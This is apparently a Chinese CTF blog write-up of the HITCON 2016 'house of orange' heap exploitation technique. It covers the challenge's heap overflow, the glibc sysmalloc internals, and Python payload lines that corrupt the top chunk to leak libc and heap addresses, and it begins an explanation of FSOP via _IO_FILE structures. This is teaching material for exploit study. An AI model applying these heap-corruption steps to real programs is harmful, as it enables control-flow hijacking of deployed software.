<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">
<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="堆利用,house_of_orange,IO_FILE,unsortedbin_attack," />










<meta name="description" content="终于学到了house of orange，看了无数师傅的博客，终于马马虎虎理清了一点思路，还是得写点笔记以免忘掉。  概述house of orange是来自Hitcon CTF 2016中的一道同名题目，其中使用了一种全新的攻击手段（现在也不新了2333），攻击的主要思路是利用 unsorted attack 修改 _IO_list_all 指针，并伪造 _IO_FILE_plus 结构体及其">
<meta name="keywords" content="堆利用,house_of_orange,IO_FILE,unsortedbin_attack">
<meta property="og:type" content="article">
<meta property="og:title" content="堆利用学习之house of orange">
<meta property="og:url" content="https://hpasserby.me/post/f8f8701e.html">
<meta property="og:site_name" content="Hpasserby">
<meta property="og:description" content="终于学到了house of orange，看了无数师傅的博客，终于马马虎虎理清了一点思路，还是得写点笔记以免忘掉。  概述house of orange是来自Hitcon CTF 2016中的一道同名题目，其中使用了一种全新的攻击手段（现在也不新了2333），攻击的主要思路是利用 unsorted attack 修改 _IO_list_all 指针，并伪造 _IO_FILE_plus 结构体及其">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://hpasserby.me/post/f8f8701e/abort_routine.jpeg">
<meta property="og:updated_time" content="2018-10-15T15:00:44.210Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="堆利用学习之house of orange">
<meta name="twitter:description" content="终于学到了house of orange，看了无数师傅的博客，终于马马虎虎理清了一点思路，还是得写点笔记以免忘掉。  概述house of orange是来自Hitcon CTF 2016中的一道同名题目，其中使用了一种全新的攻击手段（现在也不新了2333），攻击的主要思路是利用 unsorted attack 修改 _IO_list_all 指针，并伪造 _IO_FILE_plus 结构体及其">
<meta name="twitter:image" content="https://hpasserby.me/post/f8f8701e/abort_routine.jpeg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://hpasserby.me/post/f8f8701e.html"/>





  <title>堆利用学习之house of orange | Hpasserby</title>
  








  
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
	
	<a href="https://github.com/Hpasserby"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_right_gray_6d6d6d.png" alt="Fork me on GitHub"></a>
	
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hpasserby</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">一个bin菜鸡</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://hpasserby.me/post/f8f8701e.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Hpasserby">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hpasserby">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">堆利用学习之house of orange</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-10-14T11:16:17+08:00">
                2018-10-14
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/堆利用学习/" itemprop="url" rel="index">
                    <span itemprop="name">堆利用学习</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/post/f8f8701e.html" class="leancloud_visitors" data-flag-title="堆利用学习之house of orange">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote>
<p>终于学到了house of orange，看了无数师傅的博客，终于马马虎虎理清了一点思路，还是得写点笔记以免忘掉。</p>
</blockquote>
<h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p>house of orange是来自Hitcon CTF 2016中的一道同名题目，其中使用了一种全新的攻击手段（现在也不新了2333），攻击的主要思路是利用 <em>unsorted attack</em> 修改 <em>_IO_list_all</em> 指针，并伪造 <em>_IO_FILE_plus</em> 结构体及其<em>vtable</em>（虚表）来劫持控制流。<br>直接上题目好了。。。<br><a id="more"></a></p>
<h1 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h1><p>程序菜单：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">+++++++++++++++++++++++++++++++++++++</span><br><span class="line">@          House of Orange          @</span><br><span class="line">+++++++++++++++++++++++++++++++++++++</span><br><span class="line"> 1. Build the house                  </span><br><span class="line"> 2. See the house                    </span><br><span class="line"> 3. Upgrade the house                </span><br><span class="line"> 4. Give up                          </span><br><span class="line">+++++++++++++++++++++++++++++++++++++</span><br><span class="line">Your choice :</span><br></pre></td></tr></table></figure></p>
<p>程序保护全开_(:зゝ∠)_:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">CANARY    : ENABLED</span><br><span class="line">FORTIFY   : ENABLED</span><br><span class="line">NX        : ENABLED</span><br><span class="line">PIE       : ENABLED</span><br><span class="line">RELRO     : FULL</span><br></pre></td></tr></table></figure></p>
<h1 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h1><p><strong>build函数：</strong></p>
<blockquote>
<p>用户输入house的名字、orange的颜色和价格，并使用两个结构体保存。</p>
</blockquote>
<p>结构体：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000</span> house           struc ; (<span class="keyword">sizeof</span>=<span class="number">0x10</span>, mappedto_6)</span><br><span class="line"><span class="number">00000000</span> orange          dq ?</span><br><span class="line"><span class="number">00000008</span> name            dq ?</span><br><span class="line"><span class="number">00000010</span> house           ends</span><br></pre></td></tr></table></figure></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000</span> orange          struc ; (<span class="keyword">sizeof</span>=<span class="number">0x8</span>, mappedto_7)</span><br><span class="line"><span class="number">00000000</span> price           dd ?</span><br><span class="line"><span class="number">00000004</span> color           dd ?</span><br><span class="line"><span class="number">00000008</span> orange          ends</span><br></pre></td></tr></table></figure>
<p>限制了只能build四次，每次build会申请3个chunk，其中只有第二个chunk(house name)可以控制大小，且最大为0x1000<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">house = (house *)<span class="built_in">malloc</span>(<span class="number">0x10</span>uLL);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"Length of name :"</span>);</span><br><span class="line">size = get_num();</span><br><span class="line"><span class="keyword">if</span> ( size &gt; <span class="number">0x1000</span> )</span><br><span class="line">    size = <span class="number">4096</span>;</span><br><span class="line">house-&gt;name = (__int64)<span class="built_in">malloc</span>(size);</span><br><span class="line"><span class="keyword">if</span> ( !house-&gt;name )</span><br><span class="line">&#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Malloc error !!!"</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"Name :"</span>);</span><br><span class="line">get_str((<span class="keyword">void</span> *)house-&gt;name, size);</span><br><span class="line">orange = (orange *)<span class="built_in">calloc</span>(<span class="number">1u</span>LL, <span class="number">8u</span>LL);</span><br></pre></td></tr></table></figure></p>
<p><strong>upgrade函数：</strong></p>
<blockquote>
<p>修改house的name、orange的颜色和价格，只能修改最近build的house。</p>
</blockquote>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">printf</span>(<span class="string">"Length of name :"</span>);</span><br><span class="line">v2 = get_num();</span><br><span class="line"><span class="keyword">if</span> ( v2 &gt; <span class="number">0x1000</span> )</span><br><span class="line">    v2 = <span class="number">4096</span>;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"Name:"</span>);</span><br><span class="line">get_str((<span class="keyword">void</span> *)qword_203068[<span class="number">1</span>], v2);</span><br></pre></td></tr></table></figure>
<p>修改name的地方没有检查size的大小，所以存在<strong>堆溢出</strong></p>
<p><strong>see函数</strong></p>
<blockquote>
<p>打印house的名字、orange的价格等，同样只能打印最近build的house。</p>
</blockquote>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><h2 id="泄露libc基址和堆地址"><a href="#泄露libc基址和堆地址" class="headerlink" title="泄露libc基址和堆地址"></a>泄露libc基址和堆地址</h2><p>发现程序中没有<code>free函数</code>，导致常规的堆利用方法都很难使用，这便是house of orange的核心之一——在没有free函数的情况下得到一个释放的堆块（unsorted bin），从而泄露数据。</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>考虑这么一种情况，假设在malloc时，程序中的bins里都没有合适的chunk，同时<strong>top chunk的大小已经不够用来分配</strong>这块内存了。那么此时程序将会调用<code>sysmalloc</code>来向系统申请更多的空间，而我们的目的则是在<code>sysmalloc</code>中的<code>_int_free()</code>，以此来获得一块释放的堆块。<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">void</span> *p = sysmalloc (nb, av); <span class="comment">//调用sysmalloc来分配内存</span></span><br><span class="line">    <span class="keyword">if</span> (p != <span class="literal">NULL</span>)</span><br><span class="line">    alloc_perturb (p, bytes);</span><br><span class="line">    <span class="keyword">return</span> p;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>对于堆来说有两种拓展方式，一是通过改变brk来拓展堆，二是通过mmap的方式。其中只有<strong>brk拓展</strong>的方式才会调用到<code>_int_free()</code>将老的top chunk释放掉，所以还需要满足一些条件。<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 如果所需分配的chunk大小大于mmap分配阈值，默认为128K，</span></span><br><span class="line"><span class="comment">// 并且当前进程使用mmap()分配的内存块小于设定的最大值</span></span><br><span class="line"><span class="comment">// 则将使用mmap()</span></span><br><span class="line"><span class="keyword">if</span> (av == <span class="literal">NULL</span> </span><br><span class="line">    || ((<span class="keyword">unsigned</span> <span class="keyword">long</span>) (nb) &gt;= (<span class="keyword">unsigned</span> <span class="keyword">long</span>) (mp_.mmap_threshold)</span><br><span class="line">    &amp;&amp; (mp_.n_mmaps &lt; mp_.n_mmaps_max))) </span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">//使用mmap()</span></span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></p>
<p>由上诉代码可知，要想使用brk拓展，需要满足<code>chunk size &lt; 0x‭20000‬</code><br>同时，在使用brk拓展之前，还会进行一系列check。<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 如果top chunk没有初始化，则size为0</span></span><br><span class="line"><span class="comment">// top chunk的大小需要 &gt;= MINSIZE(有师傅的博客说在64位下是0x20)</span></span><br><span class="line"><span class="comment">// top chunk的inuse位需要是 1</span></span><br><span class="line"><span class="comment">// 检查是否对齐到内存页</span></span><br><span class="line">assert ((old_top == initial_top (av) &amp;&amp; old_size == <span class="number">0</span>) </span><br><span class="line">        || ((<span class="keyword">unsigned</span> <span class="keyword">long</span>) (old_size) &gt;= MINSIZE </span><br><span class="line">        &amp;&amp; prev_inuse (old_top)</span><br><span class="line">        &amp;&amp; ((<span class="keyword">unsigned</span> <span class="keyword">long</span>) old_end &amp; pagemask) == <span class="number">0</span>));</span><br></pre></td></tr></table></figure></p>
<p>这里主要关注如何对齐到内存页。现代操作系统都是以内存页为单位进行内存管理的，一般内存页大小为4kb(0x1000)，那么top chunk的size加上top chunk的地址所得到的值是和0x1000对齐的。如：<code>0x602020+0x20fe0=0x623000</code>。</p>
<p>整理以上代码，<strong>所需的条件有</strong>：</p>
<blockquote>
<ul>
<li>分配的chunk大小小于0x‭20000，大于top chunk‬的size</li>
<li>top chunk大小大于 MINSIZE（不能太小就行）</li>
<li>top chunk的inuse为 1</li>
<li>top chunk的大小要对齐到内存页</li>
</ul>
</blockquote>
<p>满足了以上各种条件之后，就可以成功的调用<code>_int_free()</code>来释放top chunk<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* If possible, release the rest. */</span></span><br><span class="line"><span class="keyword">if</span> (old_size &gt;= MINSIZE)</span><br><span class="line">&#123;</span><br><span class="line">    _int_free (av, old_top, <span class="number">1</span>);<span class="comment">//调用_int_free，free old_top。</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>此后，原先的top chunk将被<strong>放入unsorted bin</strong>中。<br>下一次分配时，就将会<strong>从unsorted bin中切割</strong>合适的大小，而切割下来的chunk的fd和bk的值将会是<strong>libc中的地址</strong>了，同时，若该chunk是large chunk，在fd_nextsize和bk_nextsizez中还会储存<strong>堆中的地址</strong>。由此便可以<strong>完成泄露</strong>了。</p>
<h3 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h3><ol>
<li><p>先build一个house，通过upgrade从name溢出到top chunk，将top chunk的大小改为<code>0xfa1</code>（name chunk的大小为0x20）</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">build(<span class="number">0x10</span>, <span class="string">'aaaa'</span>)</span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x18</span> + p64(<span class="number">0x21</span>) + p64(<span class="number">0</span>)*<span class="number">3</span> + p64(<span class="number">0xfa1</span>)</span><br><span class="line">upgrade(<span class="number">0x100</span>, payload)</span><br></pre></td></tr></table></figure>
 <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//内存情况：</span></span><br><span class="line"><span class="number">0x55e0ebd68000</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000021</span> &lt;== house</span><br><span class="line"><span class="number">0x55e0ebd68010</span>:	<span class="number">0x000055e0ebd68050</span>	<span class="number">0x000055e0ebd68030</span></span><br><span class="line"><span class="number">0x55e0ebd68020</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000021</span> &lt;== name</span><br><span class="line"><span class="number">0x55e0ebd68030</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x55e0ebd68040</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x0000000000000021</span> &lt;== orange</span><br><span class="line"><span class="number">0x55e0ebd68050</span>:	<span class="number">0x0000001f00000008</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x55e0ebd68060</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000fa1</span> &lt;== top chunk</span><br></pre></td></tr></table></figure>
</li>
<li><p>申请一个大于top chunk的空间，触发brk来拓展top chunk。原top chunk将会被放入unsorted bin</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">build(<span class="number">0x1000</span>, <span class="string">'aaaa'</span>)</span><br></pre></td></tr></table></figure>
 <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//内存情况：</span></span><br><span class="line"><span class="comment">//因为我不是同一次运行，地址可能和前面不匹配</span></span><br><span class="line">unsortedbin</span><br><span class="line">all: <span class="number">0x7f7ab34f37b8</span> (main_arena+<span class="number">88</span>) —▸ <span class="number">0x5598255700a0</span> ◂— <span class="number">0x7f7ab34f37b8</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>再申请一个大小合适的large chunk，该chunk将会从unsorted bin中切割下来。</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">build(<span class="number">0x400</span>, <span class="string">'a'</span>*<span class="number">0x8</span>)</span><br></pre></td></tr></table></figure>
 <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//内存情况：</span></span><br><span class="line">pwndbg&gt; x/<span class="number">32</span>gx <span class="number">0x559d1a1d40c0</span></span><br><span class="line"><span class="number">0x559d1a1d40c0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000411</span></span><br><span class="line"><span class="number">0x559d1a1d40d0</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x00007f732b8fddc8</span> &lt;== libc</span><br><span class="line"><span class="number">0x559d1a1d40e0</span>:	<span class="number">0x0000559d1a1d40c0</span>	<span class="number">0x0000559d1a1d40c0</span> &lt;== heap</span><br><span class="line"><span class="number">0x559d1a1d40f0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>调用see()，输出name时，将会把libc的地址泄露出来。再调用upgrade()，把bk也全部填充为’a’，那么下一次see()就可以泄露出heap的地址。</p>
</li>
</ol>
<h2 id="劫持流程"><a href="#劫持流程" class="headerlink" title="劫持流程"></a>劫持流程</h2><p>接下来将会涉及到IO_FILE的利用，这种方法被称为<strong>FSOP</strong>(File Stream Oriented Programming)</p>
<h3 id="FILE介绍"><a href="#FILE介绍" class="headerlink" title="FILE介绍"></a>FILE介绍</h3><blockquote>
<p>FILE在Linux系统的标准IO库中是用于描述文件的结构，称为文件流。FILE结构在程序执行fopen等函数时会进行创建。</p>
</blockquote>
<p>每个FILE结构都通过一个 <strong>_IO_FILE_plus</strong>结构体来定义，结构体如下：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE_plus</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  _IO_FILE file;</span><br><span class="line">  <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> _<span class="title">IO_jump_t</span> *<span class="title">vtable</span>;</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
<p>其中包括一个<code>_IO_FILE</code>结构体和一个<code>vtable</code>(虚表)指针。<br><code>_IO_FILE</code>结构体保存了FILE的各种信息。<br><code>vtable</code>(虚表)指针指向了一系列函数指针，稍后就会用到其中的函数。</p>
<p><strong>_IO_FILE</strong>结构定义如下：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span> &#123;</span></span><br><span class="line">  <span class="keyword">int</span> _flags;       <span class="comment">/* High-order word is _IO_MAGIC; rest is flags. */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _IO_file_flags _flags</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* The following pointers correspond to the C++ streambuf protocol. */</span></span><br><span class="line">  <span class="comment">/* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_read_ptr;   <span class="comment">/* Current read pointer */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_read_end;   <span class="comment">/* End of get area. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_read_base;  <span class="comment">/* Start of putback+get area. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_write_base; <span class="comment">/* Start of put area. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_write_ptr;  <span class="comment">/* Current put pointer. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_write_end;  <span class="comment">/* End of put area. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_buf_base;   <span class="comment">/* Start of reserve area. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_buf_end;    <span class="comment">/* End of reserve area. */</span></span><br><span class="line">  <span class="comment">/* The following fields are used to support backing up and undo. */</span></span><br><span class="line">  <span class="keyword">char</span> *_IO_save_base; <span class="comment">/* Pointer to start of non-current get area. */</span></span><br><span class="line">  <span class="keyword">char</span> *_IO_backup_base;  <span class="comment">/* Pointer to first valid character of backup area */</span></span><br><span class="line">  <span class="keyword">char</span> *_IO_save_end; <span class="comment">/* Pointer to end of non-current get area. */</span></span><br><span class="line"></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_marker</span> *_<span class="title">markers</span>;</span></span><br><span class="line"></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span> *_<span class="title">chain</span>;</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">int</span> _fileno;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">if</span> 0</span></span><br><span class="line">  <span class="keyword">int</span> _blksize;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">else</span></span></span><br><span class="line">  <span class="keyword">int</span> _flags2;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">  _IO_off_t _old_offset; <span class="comment">/* This used to be _offset but it's too small.  */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> __HAVE_COLUMN <span class="comment">/* temporary */</span></span></span><br><span class="line">  <span class="comment">/* 1+column number of pbase(); 0 is unknown. */</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">short</span> _cur_column;</span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">char</span> _vtable_offset;</span><br><span class="line">  <span class="keyword">char</span> _shortbuf[<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line">  <span class="comment">/*  char* _save_gptr;  char* _save_egptr; */</span></span><br><span class="line"></span><br><span class="line">  _IO_lock_t *_lock;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> _IO_USE_OLD_IO_FILE</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
